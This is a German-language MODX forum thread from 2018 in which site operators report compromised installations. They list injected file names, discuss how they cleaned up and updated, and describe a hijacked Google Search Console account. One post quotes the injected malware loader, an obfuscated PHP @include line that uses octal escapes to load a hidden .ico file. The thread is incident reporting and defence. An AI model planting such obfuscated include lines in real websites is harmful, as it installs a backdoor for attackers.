<![CDATA[ Angriff auf MODX Seiten

<![CDATA[ Angriff auf MODX Seiten - My Forums]]> https://forums.modx.com/thread/?thread=104073 <![CDATA[Angriff auf MODX Seiten]]> https://forums.modx.com/thread/104073/angriff-auf-modx-seiten?page=2#dis-post-559749 Hat noch jemand von euch diese Probleme? Kann ein Shadcode über das CMS eingeschleut werden oder nur über FTP?
~/modx/assets/components/ace/sxk5cefpsf.php
~/modx/2jtybto4wu.php
]]> alfi65 Jul 20, 2018, 06:51 PM https://forums.modx.com/thread/104073/angriff-auf-modx-seiten?page=2#dis-post-559749 <![CDATA[Re: Angriff auf MODX Seiten]]> https://forums.modx.com/thread/104073/angriff-auf-modx-seiten?page=2#dis-post-561733 Jupp!

In minifix war die munee.php mit Vorschaltcode versehen. Habe es mal dran gehängt. Ein 7-stufiger Angriff, der sich über den ganzen Server zieht. Jede einzelne Datei ist zu prüfen. Das hat mir wirklich sehr viele Tage Arbeit beschert.

Das eingespielte Backup war übrigens von Mitte Juli und sowas von verseucht. Ältere Backups wird schon schwieriger.

Jetzt mache ich neun Webseiten lieber komplett neu auf einem anderen Server. :-((]]> rnrkrft Sep 25, 2018, 03:36 PM https://forums.modx.com/thread/104073/angriff-auf-modx-seiten?page=2#dis-post-561733 <![CDATA[Re: Angriff auf MODX Seiten]]> https://forums.modx.com/thread/104073/angriff-auf-modx-seiten?page=2#dis-post-561717 Jako Sep 24, 2018, 08:26 AM https://forums.modx.com/thread/104073/angriff-auf-modx-seiten?page=2#dis-post-561717 <![CDATA[Re: Angriff auf MODX Seiten]]> https://forums.modx.com/thread/104073/angriff-auf-modx-seiten#dis-post-561687
Update auf modx 2.6.5 und Gallery 1.7.1 gemacht und bekam heute trotzdem erneut Dateien eingeschleust:

http.836565742893abde7371fbf19ddc8253.php
icees.php.php.png
ruafiqxv.php
seo_script.php
view.class.php
wp-load-5b7a23c0744615b7a23c0744af.php
xgokbaqu.php

Nun gucke ich doch ziemlich erstaunt!
]]> rnrkrft Sep 21, 2018, 01:59 PM https://forums.modx.com/thread/104073/angriff-auf-modx-seiten#dis-post-561687 <![CDATA[Re: Angriff auf MODX Seiten]]> https://forums.modx.com/thread/104073/angriff-auf-modx-seiten#dis-post-561182 Quote from: alfi65 at Aug 26, 2018, 07:28 AM

Quote from: rnrkrft at Aug 25, 2018, 11:23 AM
Sorry, welcher Beitrag "hier" zum Auffinden? (oder habe ich dich missverstanden?)

Der Beitrag https://forums.modx.com/thread/94643/how-to-clean-up-your-hacked-webspace im Forum war gemeint.
Backup einspielen, sofort updaten auf 2.6.5 (2.7-dev aus dem GIT wollte ich nicht) und sofort alle Updates für die Plugins machen. Dann überwachen. Sobald wieder Index-Dateien geschrieben werden, unsichtbare ICONs auftauchen, sich ein Datum ändert - nochmal von Vorne. Falls es nicht hilft, ein älteres Backup versuchen.

Bei einer Installation stand in den Packages dann noch die Galerie 1.7.0 auf der Platte, obwohl im Manager gelöscht (kein Wunder bei dem ständigen hin und her). Also alle Verzeichnisse händisch prüfen - dann klappt 's auch (Finger gekreuzt).

Logs durchsuchen und eventuell IPs sperren, die fail2ban nicht erwischen kann.

Mein Hacker Angriff betraf nicht nur die Server auf denen die Seiten liegen. Die Seiten wurden auch bei Google übernommen. In der Google-Konsole stand ein neuer Eigentümer, über Analytics legitimiert.

Hat einige Tage gekostet, aber ich habe hoffentlich alles erwischt.]]> rnrkrft Aug 28, 2018, 09:32 AM https://forums.modx.com/thread/104073/angriff-auf-modx-seiten#dis-post-561182 <![CDATA[Re: Angriff auf MODX Seiten]]> https://forums.modx.com/thread/104073/angriff-auf-modx-seiten#dis-post-561103 Quote from: rnrkrft at Aug 25, 2018, 11:23 AM

Der Beitrag hier zum Auffinden von kompromittierten Dateien hilft. Ansonsten mach es, wie ich:

Sorry, welcher Beitrag "hier" zum Auffinden? (oder habe ich dich missverstanden?)]]> alfi65 Aug 26, 2018, 07:28 AM https://forums.modx.com/thread/104073/angriff-auf-modx-seiten#dis-post-561103 <![CDATA[Re: Angriff auf MODX Seiten]]> https://forums.modx.com/thread/104073/angriff-auf-modx-seiten#dis-post-561094 Quote from: alfi65 at Jul 21, 2018, 08:11 AM

Vielen Dank. Wird sofort gemacht. Wie erkenne ich, dass Dateien eingeschleußt wurden, ausser durch einen Hinweis von 1&1?

Der Beitrag hier zum Auffinden von kompromittierten Dateien hilft. Ansonsten mach es, wie ich:

1. Jedes Verzeichnis und jede Datei kontrollieren, oder
2. komplett neu aufsetzen.

Ich schieb die betroffenen Domains auf einen andern meiner Server und prüfe auf dem alten Server, auf Unregelmässigkeiten.

Noch ist mir nicht klar, wie das gemacht wird, guck' ich mir aber genau an, wenn alles wieder dicht ist. ;-))]]> rnrkrft Aug 25, 2018, 11:23 AM https://forums.modx.com/thread/104073/angriff-auf-modx-seiten#dis-post-561094 <![CDATA[Re: Angriff auf MODX Seiten]]> https://forums.modx.com/thread/104073/angriff-auf-modx-seiten#dis-post-561092
/*b441d*/

@include "\057var/\167ww/v\150osts\057baue\162nhau\163-ate\154ier.\144e/ht\164pdoc\163/ass\145ts/i\155g/sy\155bols\057.a5a\0601f94\056ico";

/*b441d*/

eingefügt.

Übrigens ist auch pdotools betroffen.

Habe glaube ich alles wieder im Griff. Aber sicher kann ich erst sein, wenn ich alles komplett neu gemacht habe.]]> rnrkrft Aug 25, 2018, 11:04 AM https://forums.modx.com/thread/104073/angriff-auf-modx-seiten#dis-post-561092 <![CDATA[Re: Angriff auf MODX Seiten]]> https://forums.modx.com/thread/104073/angriff-auf-modx-seiten#dis-post-561007 Was wird im Index und htaccess umgeschrieben?]]> alfi65 Aug 22, 2018, 05:42 PM https://forums.modx.com/thread/104073/angriff-auf-modx-seiten#dis-post-561007 <![CDATA[Re: Angriff auf MODX Seiten]]> https://forums.modx.com/thread/104073/angriff-auf-modx-seiten#dis-post-561005

.a5a01f94.ico
.bb9536c0.ico
.c87b6257.ico
.d0908ae6.ico
7cwxqdt1ce.php
29m4x9wh48.php
5746m905e7.php
css.php.php.png
icees.php.php.png
jwdzatia.php
njrufwpg.php
o4c0qi5a17.php]]> rnrkrft Aug 22, 2018, 03:54 PM https://forums.modx.com/thread/104073/angriff-auf-modx-seiten#dis-post-561005